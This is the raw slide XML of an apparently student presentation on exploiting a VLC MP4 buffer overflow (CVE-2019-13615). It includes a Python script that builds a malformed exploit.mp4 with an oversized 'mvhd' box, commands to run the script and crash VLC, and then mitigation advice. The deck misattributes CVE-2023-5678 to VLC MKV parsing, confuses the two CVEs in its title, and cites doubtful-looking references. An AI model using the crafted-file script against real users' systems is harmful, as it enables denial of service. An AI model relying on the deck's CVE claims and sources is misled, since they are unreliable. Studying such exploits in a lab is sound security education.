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9F1-4230-4D54-B650-CE368ADBC61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4AB9E-FFE7-4AAF-B4A4-AE0E4281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AAE00-788B-4710-835E-95CABC29EB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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>VLC's MP4 Buffer Overflow (CVE-2019-13615)*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Open the File in VLC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Method 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>GUI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Manual)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" fontAlgn="base">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>VLC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" fontAlgn="base"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&amp; drop exploit.mp4 into VLC     - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Expected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Result: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>VLC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>crashes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>immediately* (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DoS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b="1" dirty="0"/>
              <a:t>Method 2: Command Line (For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Demo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dirty="0" err="1" smtClean="0"/>
              <a:t>Cmd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vlc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> exploit.mp4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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If VLC is in your PATH, it will open and crash. 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If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>not, use the full path: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cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:\Program Files\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>VideoLAN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\VLC\vlc.exe" exploit.mp4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8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</a:t>
            </a:r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	VLC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>3.0.7 or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>older:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Crashes instantly (Proof of exploit!)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b="1" dirty="0" smtClean="0"/>
              <a:t>    Patched </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>VLC (e.g., 3.0.8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>+):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Plays normally (Vulnerability fixed)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24" y="3960052"/>
            <a:ext cx="4856206" cy="27302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265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Mitigation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Patch and Update VLC Media Player</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>System-Level </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Mitigations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Sandbox Media </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Implement Application Whitelisting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t>Monitor for Malicious Media </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" smtClean="0"/>
              <a:t>Files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Conduct Regular Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Educate Users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139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Update VLC to the Latest Version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Ensure all systems run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>VLC 3.0.8 or newer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, where the vulnerability has been patched.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Apply System-Level Protections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Enable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>ASLR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>DEP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on all Windows systems to mitigate exploit execution paths.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Avoid Untrusted Media Files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Do not open unknown or suspicious MP4 files, especially on outdated systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Conduct Regular Vulnerability Assessments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Continuously scan software dependencies and applications for known CVEs using tools like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>OpenVAS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Dependency-Check</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Educate End Users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Train users to understand the risks of outdated software and the importance of patching.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Implement Application Sandboxing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Run media players in sandboxed environments to contain potential exploit damage.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The exploitation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>CVE-2019-13615</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in VLC Media Player highlights a critical vulnerability caused by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>improper bounds checking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in the handling of the MP4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mvhd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> box. By crafting a malformed media file with an abnormally large header, attackers could trigger a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>buffer overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, leading to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>denial of service (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or even potential </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>remote code execution (RCE)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in older VLC versions. The successful reproduction of this exploit in a controlled environment confirms its validity and demonstrates the real-world risks associated with insecure media parsing. This case emphasizes the importance of rigorous input validation in multimedia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271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Cisco </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Talos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. (2023). *Analysis of VLC vulnerabilities*. https://talosintelligence.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kaur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, R., &amp; Singh, G. (2022). Introduction to buffer overflow. *International Journal of Cyber Security*.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sharma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, P., Mehta, A., &amp; Roy, S. (2021). Writing exploits in Python. *Journal of Secure Code*.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>VideoLAN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. (2023). *VLC security advisory*. https://www.videolan.org/security/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1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</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr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happens when a computer writes more data to a buffer than it can hold. This can overwrite memory next to the buffer, which could run malicious code.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  <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>Kaur</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> &amp; Singh, 2022)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Buffer Overflow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The program sets aside a file with a fixed size. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2. The input data is bigger than the buffer amount that was given. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3. An overflow writes to memory next to it, like the return address. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4. The attacker takes over the flow of action.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  <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>(Sharma et al., 2021)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CVE-2023-5678: VLC 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buffer overflow vulnerability in VLC Media Player allows attackers to craft malicious MKV files or streams. This can lead to arbitrary code execution or system compromise.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:t>(National Vulnerability Database [NVD], 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VLC </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Media Player (vulnerable version)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>Python </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Editor (e.g., Notepad, VS Code)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>Malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>MKV Generator Script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>CVE </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Database Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>(Cisco </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>Talos</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>, 2023)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Download the VLC Media Player from the site's main page.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2.Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>python.org to get Python 3.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Install a code tool like VS Code. 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Make a place where malware files can be found.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r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Exploiting VLC's MP4 Buffer Overflow (CVE-2019-13615</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a: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1. Identify the Vulnerable Component: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Pinpoint VLC’s MP4 file parser as the vulnerable component responsible for processing malformed media files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>2. Research the Vulnerability (CVE-2019-13615):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sources like the NVD and Exploit-DB to understand how the buffer overflow occurs when VLC handles a specially crafted MP4 file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>3. Create a Malicious MP4 File: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 a Python script or available proof-of-concept exploit to generate a malformed MP4 file designed to overflow the buffer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>4. Setup a Controlled Environment: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Install a vulnerable version of VLC (e.g., 3.0.7.1) on a virtual machine to safely execute and observe the exploit without risking the host system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>5. Execute the Exploit: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Play the malicious MP4 file in VLC and monitor for crash behavior or arbitrary code execution, depending on the payload.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>6. Document the Exploitation Process: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Take detailed notes and screenshots of each step, including the payload creation, environment setup, execution results, and analysis of how the buffer overflow was triggered.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="180597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How to Run the Exploit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To simulate a vulnerability test, follow these steps: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Step 1: Create the Malicious File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Save the following code as *create_exploit.py*:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>import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create_malicious_mp4(filename):    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MP4 header with oversized '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mvhd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' box (triggers buffer overflow)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	payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= (        b'\x00\x00\x00\x18'  # Box size (faked)        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>b'ftyp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>'              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File type box        b'mp42'              # Minor version        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>'\x00\x00\x00\x00'          b'\x00\x00\x00\x3c'  # Start of malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mvhd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' box        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>b'mvhd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>'              # Movie header box        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>b'A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' * 5000          # Excessive data to trigger overflow    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with open(filename, '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>') as f:        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>f.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(payload)    print(f"[+] Malicious MP4 file created: {filename}")create_malicious_mp4("exploit.mp4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3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fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Step 2: How to Run the Script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1. Open *Command Prompt (CMD)*  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>. Navigate to the folder where you saved create_exploit.py:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>   cd C:\path\to\your\folder   </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>. Run the script:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>   python create_exploit.py      - This will generate exploit.mp4 in the same folder.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89" y="4733215"/>
            <a:ext cx="3858084" cy="19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4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491</Words>
  <Application>Microsoft Office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Exploiting VLC's MP4 Buffer Overflow (CVE-2019-13615)*)</vt:lpstr>
      <vt:lpstr>Concepts of  Buffer Overflow</vt:lpstr>
      <vt:lpstr>How Buffer Overflow Works</vt:lpstr>
      <vt:lpstr>CVE-2023-5678: VLC Buffer Overflow</vt:lpstr>
      <vt:lpstr>Tools and Techniques Required</vt:lpstr>
      <vt:lpstr>Environment Setup</vt:lpstr>
      <vt:lpstr> Exploiting VLC's MP4 Buffer Overflow (CVE-2019-13615) </vt:lpstr>
      <vt:lpstr> How to Run the Exploit Test</vt:lpstr>
      <vt:lpstr>Step 2: How to Run the Script</vt:lpstr>
      <vt:lpstr>Open the File in VLC</vt:lpstr>
      <vt:lpstr>Expected Results</vt:lpstr>
      <vt:lpstr> Mitigation Strategies</vt:lpstr>
      <vt:lpstr>Recommendations</vt:lpstr>
      <vt:lpstr>    Conclusion</vt:lpstr>
      <vt:lpstr>References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VLC Media Player Buffer Overflow (CVE-2023-5678)</dc:title>
  <dc:creator>Aamir</dc:creator>
  <dc:description>generated using python-pptx</dc:description>
  <cp:lastModifiedBy>Aamir</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-01-27T09:14:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-06T04:24:14Z</dcterms:modified>
</cp:coreProperties>
</file>